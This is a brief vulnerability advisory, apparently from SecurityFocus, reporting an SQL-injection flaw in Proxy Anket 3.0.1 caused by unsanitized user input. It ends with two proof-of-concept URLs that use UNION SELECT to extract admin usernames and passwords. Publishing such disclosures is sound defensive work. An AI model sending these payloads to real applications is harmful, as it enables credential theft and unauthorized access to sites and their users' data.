10 lines
No EOL
636 B
Text
10 lines
No EOL
636 B
Text
source: https://www.securityfocus.com/bid/25613/info
|
|
|
|
Proxy Anket is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
|
|
|
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
|
|
|
This issue affects Proxy Anket 3.0.1; other versions may also be vulnerable.
|
|
|
|
http://www.example.com/anketv3/anket.asp?islem=oyla&id=1+union+select+0,1,username,3+from+admin
|
|
http://www.example.com/anketv3/anket.asp?islem=oyla&id=1+union+select+0,1,password,3+from+admin |